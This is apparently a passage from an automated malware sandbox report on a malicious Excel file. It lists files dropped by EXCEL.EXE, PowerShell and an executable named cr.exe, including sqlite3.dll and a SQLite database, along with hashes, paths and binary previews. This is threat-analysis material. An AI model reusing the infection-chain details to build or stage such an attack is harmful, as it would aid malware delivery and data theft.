                                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):326
                                                        Entropy (8bit):3.1121144470001534
                                                        Encrypted:false
                                                        SSDEEP:6:kKpAFwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mykPlE99SNxAhUegeT2
                                                        MD5:245D002CE8629C434AA6D1ABBC88246E
                                                        SHA1:4BD8B6059AE578468BF700C2848F5D6F24475CB6
                                                        SHA-256:EC375FD4940F7DFF765BB2183318499C4CB078C7FF05831052550834AD1DEADC
                                                        SHA-512:24E95C9D034B9A6480C2989582AF0835CEF463340E51104A123E63FBAEE9B0B67DC783FB86FA8A9C6F24FCC8259A31B65B08030DF87676FA9F1C2A54F71482CF
                                                        Malicious:false
                                                        Preview: p...... .........Ku.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):252
                                                        Entropy (8bit):3.0215269645321685
                                                        Encrypted:false
                                                        SSDEEP:3:kkFklCwJNl/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKPmRliBAIdQZV7eAYLit
                                                        MD5:F541E4217A2CBE51440A4BA11A78F387
                                                        SHA1:1B37FCF58B5F607D761A4BCAEE4556A913E574CC
                                                        SHA-256:A35B8C5CD442FB4486F2A8782176D2CBBF2ADF45D9B97AFA66E718E76289CC75
                                                        SHA-512:943F0026126E8763D5882FD05AAC609D2274CF313B952B2D5D096BEBEA85C18FDED81968F3CBDB5EEAD12DAAAE05D7E2F2FB93DD54D3525FC7F28DFB36C5C860
                                                        Malicious:false
                                                        Preview: p...... ....`....B......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                        C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.7798653713156546
                                                        Encrypted:false
                                                        SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                        MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                        SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                        SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                        SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                        Malicious:false
                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):916735
                                                        Entropy (8bit):6.514932604208782
                                                        Encrypted:false
                                                        SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                        MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                        SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                        SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                        SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: COO_TPE0269320_image2020-12-31-055841.exe, Detection: malicious, Browse
                                                        • Filename: sek750_2021.exe, Detection: malicious, Browse
                                                        • Filename: 0I2ddZZKv7.exe, Detection: malicious, Browse
                                                        • Filename: Q2BZ01fmwK.exe, Detection: malicious, Browse
                                                        • Filename: fiUdG0AFun.exe, Detection: malicious, Browse
                                                        • Filename: sU0m70ahcm.exe, Detection: malicious, Browse
                                                        • Filename: vDKnVBINrY.exe, Detection: malicious, Browse
                                                        • Filename: HOJAsmBUjl.exe, Detection: malicious, Browse
                                                        • Filename: FwkgiBlwcg.exe, Detection: malicious, Browse
                                                        • Filename: 0XxTmF8pEW.exe, Detection: malicious, Browse
                                                        • Filename: uMtPsgsHU2.exe, Detection: malicious, Browse
                                                        • Filename: ZJaczSqbMl.exe, Detection: malicious, Browse
                                                        • Filename: 53CmqAXIHb.exe, Detection: malicious, Browse
                                                        • Filename: VWOhpUmgcP.exe, Detection: malicious, Browse
                                                        • Filename: S5N3DvtQ0h.exe, Detection: malicious, Browse
                                                        • Filename: q7ryNCLGYT.exe, Detection: malicious, Browse
                                                        • Filename: rZ28UGXv3X.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: 530ppafC4x.exe, Detection: malicious, Browse
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                        C:\Users\user\AppData\Local\Temp\741F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):265254
                                                        Entropy (8bit):7.974700866105644
                                                        Encrypted:false
                                                        SSDEEP:6144:nrDk/RQb44UWE035WaNeoYOcAYiyJTs9Q8yWz:nnLxUWGaNesYbTH8yq
                                                        MD5:0486A5D5BC90F4A9CDFE127660C9C324
                                                        SHA1:D92C02486FB7718F44CADD647B0FA01CF32DAE9F
                                                        SHA-256:6AA194CFD6889FD8F6BB56520EA3D5C9A80E01E939DCC3AF1FD80D3649F332AF
                                                        SHA-512:814EB1B5142BB4AF632233CB5629EE4F6E0A8A4DEC10DA7DF33D89EB3F6C4B6102C638098BFCA318BEE88A4BB549E90C87F7403D7D3BAD92B711CF78B08CDEA8
                                                        Malicious:false
                                                        Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\Cab6613.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                        C:\Users\user\AppData\Local\Temp\Tar6614.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):152533
                                                        Entropy (8bit):6.31602258454967
                                                        Encrypted:false
                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                        Malicious:false
                                                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=8192, window=hide
                                                        Category:dropped
                                                        Size (bytes):867
                                                        Entropy (8bit):4.489503739489606
                                                        Encrypted:false
                                                        SSDEEP:12:85QMCLgXg/XAlCPCHaX5B8zDXB/h8X+WnicvbUbDtZ3YilMMEpxRljKGwyTdJP9O:85LU/XTp6zLcYe0Dv3qHwqrNru/
                                                        MD5:1AF82EB593899CBB3FE4C0A5963DB3CE
                                                        SHA1:2FD54A6ED91E337FECF797A8AA84C94CB85E5B9E
                                                        SHA-256:6C968B89F756B291AA577E52DA6B094932C5449F652AF331289FC0F866CDCE64
                                                        SHA-512:3348A5E9D0980CD5AC39791B1AACEAE44E6F3C1EB706DD90AEB359EA031048BA8C04A6507E565991E66A9F90A77D73D0D8C59375C84455234B70FDB36E6DA33D
                                                        Malicious:false
                                                        Preview: L..................F...........7G..@.t.....@.t...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....(R....Desktop.d......QK.X(R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):83
                                                        Entropy (8bit):4.42866744313446
                                                        Encrypted:false
                                                        SSDEEP:3:oyBVomMUVnRJpSIJdnRJpSmMUVnRJpSv:dj6MnxfdnxEMnxc
                                                        MD5:ABFBBA964FE194830991FC3EDDE3FB4A
                                                        SHA1:7E2AD416D70C53F0E3A6C31035D55C670D70A57E
                                                        SHA-256:D855D7448592A8D2F464D582E53D2346D55F3E09F765D2CC18229B09BF3EBA90
                                                        SHA-512:D647981A3C6787C6F6DBFCED8F20F7B42BB420C6DE38C005A2B22174CD66692254271B669EF79C4691ED3F9AAE796E13D15EC7E145BCE4BC1ABA5B804DA5D409
                                                        Malicious:false
                                                        Preview: Desktop.LNK=0..[xls]..ul9kpUwYel.LNK=0..ul9kpUwYel.LNK=0..[xls]..ul9kpUwYel.LNK=0..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ul9kpUwYel.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:24 2020, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=289280, window=hide
                                                        Category:dropped
                                                        Size (bytes):2028
                                                        Entropy (8bit):4.521373297611859
                                                        Encrypted:false
                                                        SSDEEP:48:85q/XTgzLZGhZnHTQh25q/XTgzLZGhZnHTQ/:8A/X8zLZaRHTQh2A/X8zLZaRHTQ/
                                                        MD5:4C6C05FC98365660BEFCC68B5251A03A
                                                        SHA1:053431E4A2C81C6AF52E24F3DF897999F033F663
                                                        SHA-256:9100D1D9AD54608B6C427B1610E7CD548F56325AD46DDD05F3DE97E6A031EA2F
                                                        SHA-512:A6DFEE4C7A1A04627EE1718A921754B1AA3088BA25FCD361F41D1D0FFBB7CD6CBAAAB260A7B873A428FA9A57393D6C5D8E0B5E55196DB87BAD3D8485B5E04AF2
                                                        Malicious:false
                                                        Preview: L..................F.... ...j.U..{..@.t......,~......j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..L..(R.. .UL9KPU~1.XLS..J.......Q.y.Q.y*...8.....................u.l.9.k.p.U.w.Y.e.l...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\ul9kpUwYel.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.l.9.k.p.U.w.Y.e.l...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1LYCPT5GDMC5WV088G26.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20519T597D0EZEFAD1MF.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNBQABH49BUBWNJMEEIM.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T70ZP6LTUP685KT127GQ.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2MFNCCZKET1DP3F8CLA.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
